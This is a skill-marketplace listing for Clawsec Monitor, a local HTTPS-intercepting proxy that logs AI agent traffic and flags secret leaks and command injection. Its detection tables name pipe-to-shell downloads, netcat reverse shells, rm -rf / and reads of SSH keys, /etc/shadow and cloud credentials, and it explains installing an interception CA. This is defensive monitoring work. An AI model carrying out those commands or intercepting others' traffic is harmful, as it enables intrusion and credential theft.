← 返回 Skills 市场

Clawsec Monitor

Name: Clawsec Monitor
Author: funsaized

作者 funsaized · GitHub ↗ · v1.0.0 · MIT-0

cross-platform ⚠ pending

总下载

当前安装

版本数

在 OpenClaw 中安装

/install clawsec-monitor

功能描述

Intercepts and logs AI agent HTTP/HTTPS traffic, detecting secret leaks, sensitive file reads, and command injection in both directions automatically.

使用说明 (SKILL.md)

clawsec

ClawSec Monitor v3.0 — See what your AI agents are really doing.

A transparent HTTP/HTTPS proxy that intercepts, inspects, and logs all AI agent traffic. Detects secrets being leaked, sensitive files being read, and command injection — automatically, in both directions.

Source & verification

All code lives in this repository. Before running anything, clone and verify:

git clone https://github.com/chrisochrisochriso-cmyk/clawsec-monitor
cd clawsec-monitor

# Verify file integrity against published checksums
shasum -a 256 -c \x3C\x3C'EOF'
71038919afa9978e2c16a4c8113b842abd992a99bebc63f677365f16812950b0  clawsec-monitor.py
dfb2c3f145ec8713ffe7799088dda1d6c93deb9d26dbb5a999425f34c467abfc  run_tests.py
f899e2d640b59fdd46c52828c460d8d2a515d7e24220b91a0e87162923c99fda  Dockerfile.clawsec
a005a2c259d78c14caeb29553ad0be7287c0608aad8e794a7b687b1e44d3a956  docker-compose.clawsec.yml
f685c09ecf0ad8034b1fa1fbe7e610bbf838fcec373795d7afe56dd2055e0d25  requirements.clawsec.txt
EOF

All files must print OK. Do not proceed if any checksum fails.

Bundled files

File	Purpose
`clawsec-monitor.py`	Main proxy script (Python 3.12, 876 lines)
`run_tests.py`	28-test regression suite
`Dockerfile.clawsec`	Python 3.12-slim container image
`docker-compose.clawsec.yml`	One-command deployment
`requirements.clawsec.txt`	Single dependency: `cryptography>=42.0.0`

Install

pip install cryptography

That is the only external dependency. No other packages are required.

Start

# Foreground — Ctrl-C or SIGTERM stops it cleanly
python3 clawsec-monitor.py start

# Without HTTPS interception (no CA needed)
python3 clawsec-monitor.py start --no-mitm

# Custom config
python3 clawsec-monitor.py start --config config.json

Route agent traffic

Set these environment variables in the specific process you want to monitor — not system-wide:

export HTTP_PROXY=http://127.0.0.1:8888
export HTTPS_PROXY=http://127.0.0.1:8888

This scopes interception to that process only.

HTTPS interception (optional)

ClawSec generates a local CA on first start at /tmp/clawsec/ca.crt.

Preferred: per-process trust (no system changes, no sudo)

export REQUESTS_CA_BUNDLE=/tmp/clawsec/ca.crt   # Python requests
export SSL_CERT_FILE=/tmp/clawsec/ca.crt         # httpx / httpcore
export NODE_EXTRA_CA_CERTS=/tmp/clawsec/ca.crt   # Node.js
export CURL_CA_BUNDLE=/tmp/clawsec/ca.crt         # curl

If system-wide trust is needed (requires sudo, review carefully):

# macOS
sudo security add-trusted-cert -d -r trustRoot \
  -k /Library/Keychains/System.keychain /tmp/clawsec/ca.crt

# Ubuntu / Debian
sudo cp /tmp/clawsec/ca.crt /usr/local/share/ca-certificates/clawsec.crt
sudo update-ca-certificates

The CA private key is stored at /tmp/clawsec/ca.key (mode 0600, directory 0700). It never leaves your machine. Treat it like any TLS private key. Use --no-mitm if you do not want HTTPS interception at all.

Commands

python3 clawsec-monitor.py stop              # graceful shutdown
python3 clawsec-monitor.py status            # running/stopped + last 5 threats
python3 clawsec-monitor.py threats           # last 10 threats as JSON
python3 clawsec-monitor.py threats --limit N

Detection patterns

EXFIL (data leaving the agent)

Pattern	Matches
`ai_api_key`	`sk-ant-`, `sk-live-`, `sk-gpt-`, `sk-pro-`
`aws_access_key`	`AKIA`, `ASIA`
`private_key_pem`	`-----BEGIN RSA/OPENSSH/EC/DSA PRIVATE KEY-----`
`ssh_key_file`	`.ssh/id_rsa`, `.ssh/id_ed25519`, `.ssh/authorized_keys`
`unix_sensitive`	`/etc/passwd`, `/etc/shadow`, `/etc/sudoers`
`dotenv_file`	`/.env`, `/.aws/credentials`
`ssh_pubkey`	`ssh-rsa \x3Ckey>` (40+ chars)

INJECTION (commands arriving at the agent)

Pattern	Matches
`pipe_to_shell`	`curl \x3Curl> \| bash`, `wget \x3Curl> \| sh`
`shell_exec`	`bash -c "..."`, `sh -i "..."`
`reverse_shell`	`nc \x3Chost> \x3Cport>`, `netcat`, `ncat`
`destructive_rm`	`rm -rf /`
`ssh_key_inject`	`echo ssh-rsa` (SSH key injection)

Threat log format

/tmp/clawsec/threats.jsonl — one JSON object per line:

{
  "direction":   "outbound",
  "protocol":    "https",
  "threat_type": "EXFIL",
  "pattern":     "ai_api_key",
  "snippet":     "Authorization: Bearer sk-ant-api01-...",
  "source":      "127.0.0.1",
  "dest":        "api.anthropic.com:443",
  "timestamp":   "2026-02-19T13:41:59.587248+00:00"
}

direction — outbound (agent → internet) or inbound (internet → agent)
threat_type — EXFIL or INJECTION
pattern — named rule that fired (see tables above)
snippet — up to 200 chars of surrounding context

Deduplication: same (pattern, dest, direction) suppressed for 60 seconds. Rotating log also at /tmp/clawsec/clawsec.log (10 MB × 3 backups).

Config reference

{
  "proxy_host":          "127.0.0.1",
  "proxy_port":          8888,
  "log_dir":             "/tmp/clawsec",
  "log_level":           "INFO",
  "max_scan_bytes":      65536,
  "enable_mitm":         true,
  "dedup_window_secs":   60
}

Docker

docker compose -f docker-compose.clawsec.yml up -d
docker exec clawsec tail -f /tmp/clawsec/threats.jsonl
docker compose -f docker-compose.clawsec.yml down

The CA persists in the clawsec_data volume across restarts.

Test suite

python3 run_tests.py   # 28/28 tests, ~5 seconds

How to help the user

When /clawsec is invoked, work out what the user needs and assist accordingly:

First run — verify checksums, install cryptography, start the monitor, confirm port 8888 is listening
Interpreting threats — run threats, explain each finding: what pattern fired, which direction, what destination, severity assessment
HTTPS MITM not working — check status for MITM ON; verify the correct CA trust env var is set for the agent runtime; confirm HTTP_PROXY/HTTPS_PROXY are in the agent's environment
False positive — explain which pattern fired and the surrounding snippet; identify whether it is a genuine match or context noise
Docker deploy — verify checksums, build image, run compose, confirm healthcheck passes
No threats appearing — confirm HTTP_PROXY is set in the agent process, check clawsec.log for bind/TLS errors, verify threats.jsonl is being written
Stopping / cleanup — stop, optionally remove /tmp/clawsec directory and uninstall the CA from the trust store

Always run python3 clawsec-monitor.py status first before troubleshooting.

Author: Chris Alley (paperknight) Source: https://github.com/chrisochrisochriso-cmyk/clawsec-monitor License: MIT

能力标签

cryptorequires-walletrequires-oauth-tokenrequires-sensitive-credentials

如何使用

确保已安装 OpenClaw（本地或 Docker 部署）
在对话框中输入安装命令：/install clawsec-monitor
安装完成后，直接呼叫该 Skill 的名称或使用 /clawsec-monitor 触发
根据 Skill 的参数说明提供必要输入，即可获得结构化输出

版本历史

v1.0.0

ClawSec Monitor v1.0.0 initial release: - Transparent HTTP/HTTPS proxy for intercepting, inspecting, and logging all AI agent traffic. - Automatic detection of secrets leakage, sensitive file access, and command injection both inbound and outbound. - Per-process proxy configuration and local CA for optional HTTPS interception. - Easy install with a single Python dependency (`cryptography`). - Threats and activity logged to `/tmp/clawsec/threats.jsonl` with deduplication. - Docker support and 28-test regression suite included.

元数据

Slug clawsec-monitor

版本 1.0.0

许可证 MIT-0

累计安装 0

当前安装数 0

历史版本数 1

常见问题

Clawsec Monitor 是什么？

Intercepts and logs AI agent HTTP/HTTPS traffic, detecting secret leaks, sensitive file reads, and command injection in both directions automatically. 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件，目前累计下载 92 次。

如何安装 Clawsec Monitor？

在 OpenClaw 或 Claude Code 对话框中运行命令「/install clawsec-monitor」即可一键安装，无需额外配置。

Clawsec Monitor 是免费的吗？

是的，Clawsec Monitor 完全免费，采用 MIT-0 许可证，可自由下载、安装和使用。

Clawsec Monitor 支持哪些平台？

Clawsec Monitor 跨平台运行，可在任意部署了 OpenClaw / Claude Code 的环境中使用（cross-platform）。

谁开发了 Clawsec Monitor？

由 funsaized（@funsaized）开发并维护，当前版本 v1.0.0。